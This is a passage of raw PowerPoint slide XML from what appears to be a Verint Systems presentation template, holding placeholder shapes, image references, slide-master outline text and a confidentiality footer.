          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="39769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49"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350" name="PlaceHolder 3"/>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0" y="3064680"/>
            <a:ext cx="12191760" cy="728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0" y="3064680"/>
            <a:ext cx="12191760" cy="33775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5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5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356" name="PlaceHolder 4"/>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58"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35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6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6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6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6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6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36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6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7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7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7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74" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="376" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603240" y="1604160"/>
            <a:ext cx="4984200" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="377" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>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94"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95"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97" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="39769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399"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400" name="PlaceHolder 3"/>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01" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3064680"/>
            <a:ext cx="12191760" cy="72864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11" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="39769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02" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3064680"/>
            <a:ext cx="12191760" cy="33775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0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0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406" name="PlaceHolder 4"/>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08"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40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41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1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1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41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1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41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1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2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42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42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24" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="426" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603240" y="1604160"/>
            <a:ext cx="4984200" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="427" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603240" y="1604160"/>
            <a:ext cx="4984200" cy="397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1"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42"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44" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="39769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13"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14" name="PlaceHolder 3"/>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46"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447" name="PlaceHolder 3"/>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48" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3064680"/>
            <a:ext cx="12191760" cy="72864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49" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3064680"/>
            <a:ext cx="12191760" cy="33775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5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52"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453" name="PlaceHolder 4"/>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55"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45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457"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5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6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461"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63"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464"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6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6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468"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469"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471" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="473" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603240" y="1604160"/>
            <a:ext cx="4984200" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="474" name="" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603240" y="1604160"/>
            <a:ext cx="4984200" cy="39769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0" y="3064680"/>
            <a:ext cx="12191760" cy="728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0" y="3064680"/>
            <a:ext cx="12191760" cy="33775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20" name="PlaceHolder 4"/>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22"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0" y="3064680"/>
            <a:ext cx="12191760" cy="728640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.wm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wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.wmf"/><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1.wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.wmf"/><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6.wmf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.wmf"/><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a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982880" y="6483240"/>
            <a:ext cx="758880" cy="178560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="11233800" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="2742840" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{6B396F33-635E-4A2F-995F-B7F12C9E2406}" type="slidenum">
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3064680"/>
            <a:ext cx="12191760" cy="728280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="5340">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the title text formatThank You</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 20" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="653760" y="831240"/>
            <a:ext cx="1310040" cy="308160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1604520"/>
            <a:ext cx="10972440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0"/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="6">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline Level</a:t>
            </a:r>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2" name="Picture 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982880" y="6483240"/>
            <a:ext cx="758880" cy="178560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="11233800" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="2742840" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{883389E0-C788-4345-B0AF-FAC976BB8882}" type="slidenum">
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="158" t="2941" r="313" b="13383"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-29160" y="0"/>
            <a:ext cx="12237120" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12191760" cy="6857640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="653760" y="831240"/>
            <a:ext cx="1310040" cy="308160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470480" y="842400"/>
            <a:ext cx="2058480" cy="1090080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="7920">
            <a:solidFill>
              <a:srgbClr val="ffffff"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4427640" y="833040"/>
            <a:ext cx="95040" cy="93240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5816520" y="1401480"/>
            <a:ext cx="131400" cy="129960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5796000" y="1379160"/>
            <a:ext cx="171000" cy="174240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5776920" y="1358640"/>
            <a:ext cx="201240" cy="215640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5753160" y="1337760"/>
            <a:ext cx="231480" cy="258480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5732640" y="1315440"/>
            <a:ext cx="288720" cy="301320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5710320" y="1294920"/>
            <a:ext cx="172800" cy="344160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5689440" y="1272600"/>
            <a:ext cx="302760" cy="387000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5667480" y="1252080"/>
            <a:ext cx="394920" cy="428400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646600" y="1228320"/>
            <a:ext cx="402840" cy="474480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
